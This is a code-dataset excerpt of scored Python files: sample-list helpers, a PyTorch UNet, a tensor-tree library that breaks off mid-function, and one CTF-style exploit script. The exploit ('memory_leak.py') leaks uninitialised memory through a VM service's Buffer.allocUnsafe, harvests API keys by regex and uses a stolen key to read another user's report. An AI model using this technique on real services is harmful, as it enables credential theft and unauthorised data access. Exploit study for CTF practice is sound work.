code stringlengths 2k 1.04M | repo_path stringlengths 5 517 | parsed_code stringlengths 0 1.04M | quality_prob float64 0.02 0.95 | learning_prob float64 0.02 0.93 |
|---|---|---|---|---|
from typing import ByteString, Union
from dempy._protofiles import SampleListMessage
from dempy.acquisitions.image_sample import ImageSample
from dempy.acquisitions.timeseries_sample import TimeseriesSample
from dempy.acquisitions.video_sample import VideoSample
class SampleList(list):
"""Wrapper list class with custom methods for handling samples
Arguments:
list {List[Sample]} -- list of samples
"""
def by_device(self, device_id: str) -> "SampleList":
"""Returns the samples of a device specified by `device_id`
Arguments:
device_id {str} -- id of the device
Returns:
SampleList -- List containing the samples
"""
return SampleList([i for i in self if i.device_id is not None and i.device_id == device_id])
def by_sensor(self, sensor_id: str) -> "SampleList":
"""Returns the samples that use the sensor specified by `sensor_id`
Arguments:
sensor_id {str} -- id of the device
Returns:
SampleList -- List containing the samples
"""
return SampleList([i for i in self if i.sensor_id is not None and i.sensor_id == sensor_id])
@staticmethod
def to_protobuf(obj: "SampleList") -> SampleListMessage:
"""Encode a sample list to a Protobuf message
Arguments:
obj {SampleList} -- sample list to be encoded
Returns:
SampleListMessage -- encoded sample list
"""
sample_list_message = SampleListMessage()
if len(obj) > 0:
if isinstance(obj[0], TimeseriesSample):
sample_list_message.timeseries.extend([TimeseriesSample.to_protobuf(s) for s in obj])
elif isinstance(obj[0], ImageSample):
sample_list_message.images.extend([ImageSample.to_protobuf(s) for s in obj])
elif isinstance(obj[0], VideoSample):
sample_list_message.videos.extend([VideoSample.to_protobuf(s) for s in obj])
else:
raise TypeError
return sample_list_message
@staticmethod
def from_protobuf(obj: ByteString) -> "SampleList":
"""Decode a Protobuf message to {SampleList}
Arguments:
obj {ByteString} -- message to be decoded
Returns:
SampleList -- decoded sample list
"""
sample_list_message = SampleListMessage()
sample_list_message.ParseFromString(obj)
sample_list = SampleList()
sample_list.extend([TimeseriesSample.from_protobuf(s) for s in sample_list_message.timeseries])
sample_list.extend([ImageSample.from_protobuf(s) for s in sample_list_message.images])
sample_list.extend([VideoSample.from_protobuf(s) for s in sample_list_message.videos])
return sample_list
class AnnotationList(list):
"""Wrapper list class with custom methods for handling annotations
Arguments:
list {List[Annotation]} -- list of annotations
"""
def by_sample(self, sample_id: str) -> "AnnotationList":
"""Returns the annotations containing a sample specified by `sample_id`
Arguments:
sample_id {str} -- id of the sample
Returns:
AnnotationList -- List containing the annotations
"""
return AnnotationList([i for i in self if i.annotated_sample_id == sample_id]) | dempy/acquisitions/_utils.py | from typing import ByteString, Union
from dempy._protofiles import SampleListMessage
from dempy.acquisitions.image_sample import ImageSample
from dempy.acquisitions.timeseries_sample import TimeseriesSample
from dempy.acquisitions.video_sample import VideoSample
class SampleList(list):
"""Wrapper list class with custom methods for handling samples
Arguments:
list {List[Sample]} -- list of samples
"""
def by_device(self, device_id: str) -> "SampleList":
"""Returns the samples of a device specified by `device_id`
Arguments:
device_id {str} -- id of the device
Returns:
SampleList -- List containing the samples
"""
return SampleList([i for i in self if i.device_id is not None and i.device_id == device_id])
def by_sensor(self, sensor_id: str) -> "SampleList":
"""Returns the samples that use the sensor specified by `sensor_id`
Arguments:
sensor_id {str} -- id of the device
Returns:
SampleList -- List containing the samples
"""
return SampleList([i for i in self if i.sensor_id is not None and i.sensor_id == sensor_id])
@staticmethod
def to_protobuf(obj: "SampleList") -> SampleListMessage:
"""Encode a sample list to a Protobuf message
Arguments:
obj {SampleList} -- sample list to be encoded
Returns:
SampleListMessage -- encoded sample list
"""
sample_list_message = SampleListMessage()
if len(obj) > 0:
if isinstance(obj[0], TimeseriesSample):
sample_list_message.timeseries.extend([TimeseriesSample.to_protobuf(s) for s in obj])
elif isinstance(obj[0], ImageSample):
sample_list_message.images.extend([ImageSample.to_protobuf(s) for s in obj])
elif isinstance(obj[0], VideoSample):
sample_list_message.videos.extend([VideoSample.to_protobuf(s) for s in obj])
else:
raise TypeError
return sample_list_message
@staticmethod
def from_protobuf(obj: ByteString) -> "SampleList":
"""Decode a Protobuf message to {SampleList}
Arguments:
obj {ByteString} -- message to be decoded
Returns:
SampleList -- decoded sample list
"""
sample_list_message = SampleListMessage()
sample_list_message.ParseFromString(obj)
sample_list = SampleList()
sample_list.extend([TimeseriesSample.from_protobuf(s) for s in sample_list_message.timeseries])
sample_list.extend([ImageSample.from_protobuf(s) for s in sample_list_message.images])
sample_list.extend([VideoSample.from_protobuf(s) for s in sample_list_message.videos])
return sample_list
class AnnotationList(list):
"""Wrapper list class with custom methods for handling annotations
Arguments:
list {List[Annotation]} -- list of annotations
"""
def by_sample(self, sample_id: str) -> "AnnotationList":
"""Returns the annotations containing a sample specified by `sample_id`
Arguments:
sample_id {str} -- id of the sample
Returns:
AnnotationList -- List containing the annotations
"""
return AnnotationList([i for i in self if i.annotated_sample_id == sample_id]) | 0.932553 | 0.341253 |
import torch
import torchvision
import torch.nn as nn
class DoubleConvBlock(nn.Module):
def __init__(self, input_channels, output_channels, kernel_size=3):
super().__init__()
self.block = nn.Sequential(
nn.Conv2d(input_channels, output_channels, kernel_size, padding='valid'),
nn.LeakyReLU(),
nn.Conv2d(output_channels, output_channels, kernel_size, padding='valid'),
nn.LeakyReLU())
def forward(self, x):
return self.block(x)
class UpConvBlock(nn.Module):
def __init__(self, input_channels, output_channels, factor=2, kernel_size=2):
super().__init__()
self.up_block = nn.Sequential(
nn.Upsample(scale_factor=factor, mode='bilinear'),
nn.Conv2d(input_channels, output_channels, kernel_size=kernel_size, padding='same'),
nn.LeakyReLU()
)
def forward(self, x):
return self.up_block(x)
class Encoder(nn.Module):
def __init__(self, channels, kernel=2, stride=2):
super().__init__()
self.max_pool = nn.MaxPool2d(kernel, stride)
self.encoder_blocks = nn.ModuleList(
[DoubleConvBlock(channels[idx - 1], channels[idx]) for idx in range(1, len(channels))])
def forward(self, x):
feature_maps = []
for block in self.encoder_blocks:
x = block(x)
feature_maps.append(x)
x = self.max_pool(x)
return feature_maps
class Decoder(nn.Module):
def __init__(self, channels, kernel_size=2, stride=2):
super().__init__()
self.upconvs = nn.ModuleList(
[UpConvBlock(channels[idx - 1], channels[idx], kernel_size, stride) for idx in
range(1, len(channels))])
self.decoder_blocks = nn.ModuleList(
[DoubleConvBlock(channels[idx - 1], channels[idx]) for idx in range(1, len(channels))])
def forward(self, x, encoder_features):
for i in range(len(self.upconvs)):
x = self.upconvs[i](x)
cropped_features = self.crop(encoder_features[i], x)
x = torch.cat([x, cropped_features], dim=1)
x = self.decoder_blocks[i](x)
return x
def crop(self, existing_map, desired_map):
batch, channel, hight, width = desired_map.shape
return torchvision.transforms.CenterCrop((hight, width))(existing_map)
class UNet(nn.Module):
def __init__(self, enc_chs, dec_chs, num_classes=1,
retain_dim=False, out_sz=(572, 572)):
super().__init__()
self.encoder = Encoder(channels=enc_chs)
self.decoder = Decoder(channels=dec_chs)
self.output = nn.Conv2d(dec_chs[-1], num_classes, 1)
self.retain_dim = retain_dim
self.out_size = out_sz
def forward(self, x):
encoder_features = self.encoder(x)
reverse_encoder_features = encoder_features[::-1]
decoder_output = self.decoder(reverse_encoder_features[0], reverse_encoder_features[1:])
output = self.output(decoder_output)
if self.retain_dim:
output = nn.functional.interpolate(output, self.out_size)
return output | project/models/unet.py | import torch
import torchvision
import torch.nn as nn
class DoubleConvBlock(nn.Module):
def __init__(self, input_channels, output_channels, kernel_size=3):
super().__init__()
self.block = nn.Sequential(
nn.Conv2d(input_channels, output_channels, kernel_size, padding='valid'),
nn.LeakyReLU(),
nn.Conv2d(output_channels, output_channels, kernel_size, padding='valid'),
nn.LeakyReLU())
def forward(self, x):
return self.block(x)
class UpConvBlock(nn.Module):
def __init__(self, input_channels, output_channels, factor=2, kernel_size=2):
super().__init__()
self.up_block = nn.Sequential(
nn.Upsample(scale_factor=factor, mode='bilinear'),
nn.Conv2d(input_channels, output_channels, kernel_size=kernel_size, padding='same'),
nn.LeakyReLU()
)
def forward(self, x):
return self.up_block(x)
class Encoder(nn.Module):
def __init__(self, channels, kernel=2, stride=2):
super().__init__()
self.max_pool = nn.MaxPool2d(kernel, stride)
self.encoder_blocks = nn.ModuleList(
[DoubleConvBlock(channels[idx - 1], channels[idx]) for idx in range(1, len(channels))])
def forward(self, x):
feature_maps = []
for block in self.encoder_blocks:
x = block(x)
feature_maps.append(x)
x = self.max_pool(x)
return feature_maps
class Decoder(nn.Module):
def __init__(self, channels, kernel_size=2, stride=2):
super().__init__()
self.upconvs = nn.ModuleList(
[UpConvBlock(channels[idx - 1], channels[idx], kernel_size, stride) for idx in
range(1, len(channels))])
self.decoder_blocks = nn.ModuleList(
[DoubleConvBlock(channels[idx - 1], channels[idx]) for idx in range(1, len(channels))])
def forward(self, x, encoder_features):
for i in range(len(self.upconvs)):
x = self.upconvs[i](x)
cropped_features = self.crop(encoder_features[i], x)
x = torch.cat([x, cropped_features], dim=1)
x = self.decoder_blocks[i](x)
return x
def crop(self, existing_map, desired_map):
batch, channel, hight, width = desired_map.shape
return torchvision.transforms.CenterCrop((hight, width))(existing_map)
class UNet(nn.Module):
def __init__(self, enc_chs, dec_chs, num_classes=1,
retain_dim=False, out_sz=(572, 572)):
super().__init__()
self.encoder = Encoder(channels=enc_chs)
self.decoder = Decoder(channels=dec_chs)
self.output = nn.Conv2d(dec_chs[-1], num_classes, 1)
self.retain_dim = retain_dim
self.out_size = out_sz
def forward(self, x):
encoder_features = self.encoder(x)
reverse_encoder_features = encoder_features[::-1]
decoder_output = self.decoder(reverse_encoder_features[0], reverse_encoder_features[1:])
output = self.output(decoder_output)
if self.retain_dim:
output = nn.functional.interpolate(output, self.out_size)
return output | 0.961642 | 0.472014 |
import sys
import requests
from enum import Enum, auto, unique
from time import sleep
from uuid import uuid4
import re
@unique
class OPCODE(Enum):
def _generate_next_value_(name, start, count, last_values):
return name
def __str__(self):
return self.name
OP_PUSH = auto()
OP_POP = auto()
OP_DUP = auto()
OP_SWAP = auto()
OP_HIDE = auto()
OP_CALL = auto()
OP_INVOKE = auto()
OP_RESET = auto()
OP_JMP = auto()
OP_JMPIF = auto()
OP_JMPNIF = auto()
OP_REPORT = auto()
OP_ADD = auto()
OP_SUB = auto()
OP_HLTCHK = auto()
OP_HLTNCHK = auto()
class VM:
def __init__(self):
self.opcodes = []
def push(self, *opcode):
self.opcodes.append(list(opcode))
def serialize(self) -> list:
return [[str(opcode[0])] + opcode[1:] for opcode in self.opcodes]
ip = sys.argv[1]
hint = sys.argv[2]
vm = VM()
vm.push(OPCODE.OP_RESET)
vm.push(OPCODE.OP_PUSH, 100)
vm.push(OPCODE.OP_PUSH, 1)
vm.push(OPCODE.OP_CALL, "context_Buffer_allocUnsafe")
vm.push(OPCODE.OP_DUP)
vm.push(OPCODE.OP_DUP)
vm.push(OPCODE.OP_PUSH, "_KEY")
vm.push(OPCODE.OP_SWAP)
vm.push(OPCODE.OP_PUSH, 1)
vm.push(OPCODE.OP_SWAP)
vm.push(OPCODE.OP_INVOKE, "indexOf")
vm.push(OPCODE.OP_PUSH, 1)
vm.push(OPCODE.OP_ADD)
vm.push(OPCODE.OP_JMPIF, 13)
vm.push(OPCODE.OP_PUSH, "API_")
vm.push(OPCODE.OP_SWAP)
vm.push(OPCODE.OP_PUSH, 1)
vm.push(OPCODE.OP_SWAP)
vm.push(OPCODE.OP_INVOKE, "indexOf")
vm.push(OPCODE.OP_PUSH, 1)
vm.push(OPCODE.OP_ADD)
vm.push(OPCODE.OP_HLTNCHK)
vm.push(OPCODE.OP_JMP, 22)
opcodes = vm.serialize()
access_key = uuid4()
key = None
while True:
ids = []
for i in range(5):
r = requests.post(f"http://{ip}:5678/api/execute", params={
"accessKey": access_key
}, json={
"opcodes": opcodes
})
ids.append(r.json()["result"]["vmId"])
sleep(3)
for idx in ids:
r = requests.get(f"http://{ip}:5678/api/getReport", params={
"accessKey": access_key,
"vmId": idx
})
keys = re.findall(rb"API_[A-Z2-7]{16}_KEY", r.content)
if len(keys) > 0:
key = keys[0].decode()
break
if key is not None:
break
r = requests.get(f"http://{ip}:5678/api/executor/getReport", params={
"apiKey": key,
"vmId": hint
})
print(r.json()["result"], flush=True) | sploits/sputnik_v8/memory_leak.py |
import sys
import requests
from enum import Enum, auto, unique
from time import sleep
from uuid import uuid4
import re
@unique
class OPCODE(Enum):
def _generate_next_value_(name, start, count, last_values):
return name
def __str__(self):
return self.name
OP_PUSH = auto()
OP_POP = auto()
OP_DUP = auto()
OP_SWAP = auto()
OP_HIDE = auto()
OP_CALL = auto()
OP_INVOKE = auto()
OP_RESET = auto()
OP_JMP = auto()
OP_JMPIF = auto()
OP_JMPNIF = auto()
OP_REPORT = auto()
OP_ADD = auto()
OP_SUB = auto()
OP_HLTCHK = auto()
OP_HLTNCHK = auto()
class VM:
def __init__(self):
self.opcodes = []
def push(self, *opcode):
self.opcodes.append(list(opcode))
def serialize(self) -> list:
return [[str(opcode[0])] + opcode[1:] for opcode in self.opcodes]
ip = sys.argv[1]
hint = sys.argv[2]
vm = VM()
vm.push(OPCODE.OP_RESET)
vm.push(OPCODE.OP_PUSH, 100)
vm.push(OPCODE.OP_PUSH, 1)
vm.push(OPCODE.OP_CALL, "context_Buffer_allocUnsafe")
vm.push(OPCODE.OP_DUP)
vm.push(OPCODE.OP_DUP)
vm.push(OPCODE.OP_PUSH, "_KEY")
vm.push(OPCODE.OP_SWAP)
vm.push(OPCODE.OP_PUSH, 1)
vm.push(OPCODE.OP_SWAP)
vm.push(OPCODE.OP_INVOKE, "indexOf")
vm.push(OPCODE.OP_PUSH, 1)
vm.push(OPCODE.OP_ADD)
vm.push(OPCODE.OP_JMPIF, 13)
vm.push(OPCODE.OP_PUSH, "API_")
vm.push(OPCODE.OP_SWAP)
vm.push(OPCODE.OP_PUSH, 1)
vm.push(OPCODE.OP_SWAP)
vm.push(OPCODE.OP_INVOKE, "indexOf")
vm.push(OPCODE.OP_PUSH, 1)
vm.push(OPCODE.OP_ADD)
vm.push(OPCODE.OP_HLTNCHK)
vm.push(OPCODE.OP_JMP, 22)
opcodes = vm.serialize()
access_key = uuid4()
key = None
while True:
ids = []
for i in range(5):
r = requests.post(f"http://{ip}:5678/api/execute", params={
"accessKey": access_key
}, json={
"opcodes": opcodes
})
ids.append(r.json()["result"]["vmId"])
sleep(3)
for idx in ids:
r = requests.get(f"http://{ip}:5678/api/getReport", params={
"accessKey": access_key,
"vmId": idx
})
keys = re.findall(rb"API_[A-Z2-7]{16}_KEY", r.content)
if len(keys) > 0:
key = keys[0].decode()
break
if key is not None:
break
r = requests.get(f"http://{ip}:5678/api/executor/getReport", params={
"apiKey": key,
"vmId": hint
})
print(r.json()["result"], flush=True) | 0.299003 | 0.084947 |
from abc import abstractmethod
import torch
class TensorTree:
"""
Generalised version of tensor. As like as tensor, it represents an object of some data type,
but also stores information about it's structure. Every layer of tree stores tensor, which
values represent one layer of data structure and links to next layers of
the structure.
"""
def __init__(self, tensor, children):
self.tensor = tensor
self.children = children
def to(self, device):
new_tensor = self.tensor.to(device)
new_children = [child.to(device) if child is not None else None for child in self.children]
return self.__class__(new_tensor, new_children)
def type(self, tensor_type):
new_tensor = self.tensor.type(tensor_type)
new_children = [child.type(tensor_type) if child is not None else None for child in self.children]
return self.__class__(new_tensor, new_children)
def rows(self):
return self.tensor.size()[0]
def prune(self, eps=1e-3, multiplier=None):
if multiplier is None:
new_tensor = self.tensor
else:
new_tensor = self.tensor * multiplier
new_children = []
for (pos, child) in enumerate(self.children):
if child is None:
new_children.append(None)
continue
not_prune = self.tensor.detach()[:, pos] > eps
if not not_prune.any():
new_children.append(None)
continue
not_prune = not_prune.view(self.rows(), 1).float()
if multiplier is None:
new_multiplier = not_prune
else:
new_multiplier = multiplier * not_prune
pruned = child.prune(eps, new_multiplier)
new_children.append(pruned)
return self.__class__(new_tensor, new_children)
@abstractmethod
def _make_strict_tensor(self, tensor, eps):
pass
def strict(self, eps=0.5):
new_tensor = self._make_strict_tensor(self.tensor, eps)
new_children = [child.strict(eps) if child is not None else None for child in self.children]
return self.__class__(new_tensor, new_children)
def cmul(self, constant):
"""
Multiply this tree by a constant value
:param constant: Constant tensor that supports broadcasting
:return: TensorTree
"""
new_tensor = constant * self.tensor
new_children = [child.cmul(constant) if child is not None else None for child in self.children]
return self.__class__(new_tensor, new_children)
def cadd(self, constant):
"""
Add a constant value to this tree
:param constant: Constant tensor that supports broadcasting
:return: TensorTree
"""
new_tensor = self.tensor + constant
new_children = [child.cadd(constant) if child is not None else None for child in self.children]
return self.__class__(new_tensor, new_children)
@abstractmethod
def matmul(self, matrix, tree_class):
"""
Multiply tensor on the top layer of this TensorTree by a matrix (M)
Then it does action similar to matrix multiplication, but on children of the TensorTree. It
multiplies the i-th children of this tensor by a constant `M[i, j]` and adds it to the j-th
children of the result.
Basically, it's a matrix multiplication, generalised to TreeTensors
:param matrix: Tensor with size [n, m], should contain field `children`: two-dimensional list of bool,
childnren[i, j] = True if we should add i-th children of this tree to the j-th child of result
:return: TreeTensor
"""
pass
def _pointwise_op(self, tensor_op, constant_op, other):
"""
Apply point-wise operation to this and other tensor, e.g. point-wise addition
:param tensor_op: Tensor operation on content of tree
:param constant_op: Constant operation
:param other: Number, Variable, Tensor or TensorTree
:return: TensorTree
"""
if not isinstance(other, TensorTree):
raise NotImplemented
new_tensor = tensor_op(self.tensor, other.tensor)
new_children = []
for (cur, (self_child, other_child)) in enumerate(zip(self.children, other.children)):
if self_child is None:
if other_child is None:
# Both children are missing
next_child = None
else:
# Other child is present
self_constant = self.tensor[:, cur].view(self.rows(), 1)
next_child = constant_op(other_child, self_constant)
else:
if other_child is None:
# Self child is present
other_constant = other.tensor[:, cur].view(other.rows(), 1)
next_child = constant_op(self_child, other_constant)
else:
# Both are present
next_child = self_child._pointwise_op(tensor_op, constant_op, other_child)
new_children.append(next_child)
return self.__class__(new_tensor, new_children)
def __mul__(self, other):
"""
Point-wise multiply this tree by a number, Tensor or TensorTree
:param other: Number, Variable, Tensor or TensorTree
:return: TensorTree
"""
return self._pointwise_op(lambda a, b: a * b, lambda t, c: t.cmul(c), other)
def __add__(self, other):
"""
Point-wise add other tree to this one
:param other: float, tensor or TensorTree
:return: TensorTree
"""
return self._pointwise_op(lambda a, b: a + b, lambda t, c: t.cadd(c), other)
@abstractmethod
def presence(self):
pass
def flat_width(self):
"""
Number of columns in flattened tensor
:return: Number
"""
res = 0
for child in self.children:
if child is None:
res += 1
else:
res += child.flat_width()
return res
def flatten(self, like_tree=None):
"""
Flattens all tensors and erases type information
:return: Flat tensor
"""
to_cat = []
rows = self.tensor.size()[0]
for (pos, child) in enumerate(self.children):
like_child = None if like_tree is None else like_tree.children[pos]
if child is None:
if like_child is not None:
zeros_count = like_child.flat_width()
flat = torch.zeros(rows, zeros_count)
else:
flat = self.tensor[:, pos].view(rows, 1)
else:
multiplied = child.cmul(self.tensor[:, pos].view(rows, 1))
flat = multiplied.flatten(like_child)
to_cat.append(flat)
res = torch.cat(to_cat, 1)
return res
def tree_mul(self, other):
"""
Multiplies first level of this tree by the other tree in a way, similar to matrix multiplication.
:param other: Other tree
:return: TensorTree
"""
if not isinstance(other, TensorTree):
raise NotImplemented
new_tree = self.matmul(other.tensor, other.__class__)
rows = new_tree.rows()
child_columns = []
child_children = []
for other_child in other.children:
if other_child is None:
child_columns.append(torch.zeros(rows))
child_children.append(None)
else:
multiplied = self.tree_mul(other_child)
child_columns.append(multiplied.presence())
child_children.append(multiplied)
child_tensor = torch.stack(child_columns, 1)
child_tree = self.__class__(child_tensor, child_children)
print(new_tree.flatten(), child_tree.flatten())
return new_tree + child_tree
def typed_tree_mul(self, other):
"""
Multiplication of trees, separated to Sum and Prod layers
:param other: Other tree
:return: TensorTree
"""
assert type(self) == type(other)
this_layer = self.__class__
next_layer = SumTree if self.__class__ == ProdTree else ProdTree
sum_base_tree = self.matmul(other.tensor, this_layer)
rows = self.rows()
sum_columns = []
sum_children = []
for other_product in other.children:
if other_product is None:
sum_columns.append(torch.zeros(rows))
sum_children.append(None)
continue
# Skip one layer and multiply with the second one
product_columns = []
product_children = []
for other_product_child in other_product.children:
if other_product_child is None:
product_columns.append(torch.zeros(rows))
product_children.append(None)
continue
multiplied = self.typed_tree_mul(other_product_child)
product_columns.append(multiplied.presence())
product_children.append(multiplied)
product_add_tensor = torch.stack(product_columns, 1)
product_add = next_layer(product_add_tensor, product_children)
sum_columns.append(product_add.presence())
sum_children.append(product_add)
sum_add_tensor = torch.stack(sum_columns, 1)
sum_add_tree = this_layer(sum_add_tensor, sum_children)
result = sum_base_tree + sum_add_tree
return result
def apply(self, func):
new_tensor = func(self.tensor)
new_children = [None if child is None else child.apply(func) for child in self.children]
return self.__class__(new_tensor, new_children)
def select_rows(self, mask):
return self.apply(lambda tensor: tensor[mask])
def apply_activation(self, func):
"""
Applies arbitrary activation functions to all tensors of this TensorTree
:param func: Activation function
:return: TreeTensor
"""
return self.apply(func)
@abstractmethod
def _apply_structured_function(self, funcs, tensor):
pass
def apply_structured_activation(self, funcs):
new_tensor = self._apply_structured_function(funcs, self.tensor)
new_children = [None if child is None else child.apply_structured_activation(funcs) for child in self.children]
return self.__class__(new_tensor, new_children)
def __repr__(self):
return 'Tree with content ' + str(self.tensor) + ' and children: ' \
+ str(self.children)
class SumTree(TensorTree):
def presence(self):
return self.tensor.sum(1)
def _apply_structured_function(self, funcs, tensor):
return funcs.sum(tensor)
def _make_strict_tensor(self, tensor, eps):
res = torch.zeros_like(tensor)
max_arg = tensor.max(1)[1]
for (i, j) in enumerate(max_arg):
res[i, j] = 1
return res
def matmul(self, matrix, tree_class):
# Multiply tensor by a matrix
new_tensor = self.tensor.mm(matrix)
_, columns = matrix.size()
new_children = [None] * columns
return tree_class(new_tensor, new_children)
def __repr__(self):
return 'Sum' + super().__repr__()
class ProdTree(TensorTree):
EPS = 1e-3
def presence(self):
return self.tensor.prod(1)
def _apply_structured_function(self, funcs, tensor):
return funcs.prod(tensor)
def _make_strict_tensor(self, tensor, eps):
res = torch.zeros_like(tensor)
res[tensor > eps] = 1
return res
def matmul(self, matrix, tree_class):
new_tensor = self.tensor.mm(matrix)
_, columns = matrix.size()
# Multiply children
new_children = [None] * columns
for (i, child) in enumerate(self.children):
if child is None:
continue
for j in range(columns):
element = matrix[i, j]
if not matrix.children[i][j] or abs(element.item()) < self.EPS:
# Skip such children
continue
multiplied = child.cmul(element)
if new_children[j] is None:
new_children[j] = multiplied
else:
new_children[j] += multiplied
return tree_class(new_tensor, new_children)
def __repr__(self):
return 'Prod' + super().__repr__()
def empty_tree():
return SumTree(torch.tensor([]), [])
def stack(trees):
"""
Concatenates TreeTensors of the same type along 0th direction.
:param trees: List of TreeTensors
:return: Merged TreeTensor
"""
if len(trees) == 0:
return empty_tree()
if len(trees) == 1:
return trees[0]
first = trees[0]
# Stack values of this layer
new_tensor = torch.cat(list(map(lambda t: t.tensor, trees)), 0)
# Stack values of next layers
new_children = []
for cur in range(len(first.children)):
next_trees = list(map(lambda t: t.children[cur], trees))
not_none = next(filter(lambda t: t is not None, next_trees), None)
if not_none is None:
# This child is missing in all trees
new_children.append(None)
else:
# Some trees contain this child
to_stack = []
child_size = len(not_none.children)
for (pos, tree) in enumerate(next_trees):
if tree is not None:
to_stack.append(tree)
else:
# Add fake tree with equal elements (to support loss function)
tree_size = trees[pos].tensor.size()[0]
if isinstance(not_none, SumTree):
content = torch.ones(tree_size, child_size) * (1.0 / child_size)
else:
content = torch.ones(tree_size, child_size) * 0.5
to_stack.append(not_none.__class__(
content,
[None for _ in range(child_size)]
))
stacked = stack(to_stack)
new_children.append(stacked)
return first.__class__(new_tensor, new_children)
def make_tuple(operands):
"""
Creates tuple of operands
:param operands: List of TensorTrees
:return: TensorTree representing tuple
"""
if len(operands) == 0:
return empty_tree()
new_tensor = torch.stack([t.presence() for t in operands], dim=1)
new_children = operands
product = ProdTree(new_tensor, new_children)
rows, _ = new_tensor.size()
sum_data = torch.ones(rows, 1)
return SumTree(sum_data, [product]) | src/main/python/runtime/trees/tensor_tree.py | from abc import abstractmethod
import torch
class TensorTree:
"""
Generalised version of tensor. As like as tensor, it represents an object of some data type,
but also stores information about it's structure. Every layer of tree stores tensor, which
values represent one layer of data structure and links to next layers of
the structure.
"""
def __init__(self, tensor, children):
self.tensor = tensor
self.children = children
def to(self, device):
new_tensor = self.tensor.to(device)
new_children = [child.to(device) if child is not None else None for child in self.children]
return self.__class__(new_tensor, new_children)
def type(self, tensor_type):
new_tensor = self.tensor.type(tensor_type)
new_children = [child.type(tensor_type) if child is not None else None for child in self.children]
return self.__class__(new_tensor, new_children)
def rows(self):
return self.tensor.size()[0]
def prune(self, eps=1e-3, multiplier=None):
if multiplier is None:
new_tensor = self.tensor
else:
new_tensor = self.tensor * multiplier
new_children = []
for (pos, child) in enumerate(self.children):
if child is None:
new_children.append(None)
continue
not_prune = self.tensor.detach()[:, pos] > eps
if not not_prune.any():
new_children.append(None)
continue
not_prune = not_prune.view(self.rows(), 1).float()
if multiplier is None:
new_multiplier = not_prune
else:
new_multiplier = multiplier * not_prune
pruned = child.prune(eps, new_multiplier)
new_children.append(pruned)
return self.__class__(new_tensor, new_children)
@abstractmethod
def _make_strict_tensor(self, tensor, eps):
pass
def strict(self, eps=0.5):
new_tensor = self._make_strict_tensor(self.tensor, eps)
new_children = [child.strict(eps) if child is not None else None for child in self.children]
return self.__class__(new_tensor, new_children)
def cmul(self, constant):
"""
Multiply this tree by a constant value
:param constant: Constant tensor that supports broadcasting
:return: TensorTree
"""
new_tensor = constant * self.tensor
new_children = [child.cmul(constant) if child is not None else None for child in self.children]
return self.__class__(new_tensor, new_children)
def cadd(self, constant):
"""
Add a constant value to this tree
:param constant: Constant tensor that supports broadcasting
:return: TensorTree
"""
new_tensor = self.tensor + constant
new_children = [child.cadd(constant) if child is not None else None for child in self.children]
return self.__class__(new_tensor, new_children)
@abstractmethod
def matmul(self, matrix, tree_class):
"""
Multiply tensor on the top layer of this TensorTree by a matrix (M)
Then it does action similar to matrix multiplication, but on children of the TensorTree. It
multiplies the i-th children of this tensor by a constant `M[i, j]` and adds it to the j-th
children of the result.
Basically, it's a matrix multiplication, generalised to TreeTensors
:param matrix: Tensor with size [n, m], should contain field `children`: two-dimensional list of bool,
childnren[i, j] = True if we should add i-th children of this tree to the j-th child of result
:return: TreeTensor
"""
pass
def _pointwise_op(self, tensor_op, constant_op, other):
"""
Apply point-wise operation to this and other tensor, e.g. point-wise addition
:param tensor_op: Tensor operation on content of tree
:param constant_op: Constant operation
:param other: Number, Variable, Tensor or TensorTree
:return: TensorTree
"""
if not isinstance(other, TensorTree):
raise NotImplemented
new_tensor = tensor_op(self.tensor, other.tensor)
new_children = []
for (cur, (self_child, other_child)) in enumerate(zip(self.children, other.children)):
if self_child is None:
if other_child is None:
# Both children are missing
next_child = None
else:
# Other child is present
self_constant = self.tensor[:, cur].view(self.rows(), 1)
next_child = constant_op(other_child, self_constant)
else:
if other_child is None:
# Self child is present
other_constant = other.tensor[:, cur].view(other.rows(), 1)
next_child = constant_op(self_child, other_constant)
else:
# Both are present
next_child = self_child._pointwise_op(tensor_op, constant_op, other_child)
new_children.append(next_child)
return self.__class__(new_tensor, new_children)
def __mul__(self, other):
"""
Point-wise multiply this tree by a number, Tensor or TensorTree
:param other: Number, Variable, Tensor or TensorTree
:return: TensorTree
"""
return self._pointwise_op(lambda a, b: a * b, lambda t, c: t.cmul(c), other)
def __add__(self, other):
"""
Point-wise add other tree to this one
:param other: float, tensor or TensorTree
:return: TensorTree
"""
return self._pointwise_op(lambda a, b: a + b, lambda t, c: t.cadd(c), other)
@abstractmethod
def presence(self):
pass
def flat_width(self):
"""
Number of columns in flattened tensor
:return: Number
"""
res = 0
for child in self.children:
if child is None:
res += 1
else:
res += child.flat_width()
return res
def flatten(self, like_tree=None):
"""
Flattens all tensors and erases type information
:return: Flat tensor
"""
to_cat = []
rows = self.tensor.size()[0]
for (pos, child) in enumerate(self.children):
like_child = None if like_tree is None else like_tree.children[pos]
if child is None:
if like_child is not None:
zeros_count = like_child.flat_width()
flat = torch.zeros(rows, zeros_count)
else:
flat = self.tensor[:, pos].view(rows, 1)
else:
multiplied = child.cmul(self.tensor[:, pos].view(rows, 1))
flat = multiplied.flatten(like_child)
to_cat.append(flat)
res = torch.cat(to_cat, 1)
return res
def tree_mul(self, other):
"""
Multiplies first level of this tree by the other tree in a way, similar to matrix multiplication.
:param other: Other tree
:return: TensorTree
"""
if not isinstance(other, TensorTree):
raise NotImplemented
new_tree = self.matmul(other.tensor, other.__class__)
rows = new_tree.rows()
child_columns = []
child_children = []
for other_child in other.children:
if other_child is None:
child_columns.append(torch.zeros(rows))
child_children.append(None)
else:
multiplied = self.tree_mul(other_child)
child_columns.append(multiplied.presence())
child_children.append(multiplied)
child_tensor = torch.stack(child_columns, 1)
child_tree = self.__class__(child_tensor, child_children)
print(new_tree.flatten(), child_tree.flatten())
return new_tree + child_tree
def typed_tree_mul(self, other):
"""
Multiplication of trees, separated to Sum and Prod layers
:param other: Other tree
:return: TensorTree
"""
assert type(self) == type(other)
this_layer = self.__class__
next_layer = SumTree if self.__class__ == ProdTree else ProdTree
sum_base_tree = self.matmul(other.tensor, this_layer)
rows = self.rows()
sum_columns = []
sum_children = []
for other_product in other.children:
if other_product is None:
sum_columns.append(torch.zeros(rows))
sum_children.append(None)
continue
# Skip one layer and multiply with the second one
product_columns = []
product_children = []
for other_product_child in other_product.children:
if other_product_child is None:
product_columns.append(torch.zeros(rows))
product_children.append(None)
continue
multiplied = self.typed_tree_mul(other_product_child)
product_columns.append(multiplied.presence())
product_children.append(multiplied)
product_add_tensor = torch.stack(product_columns, 1)
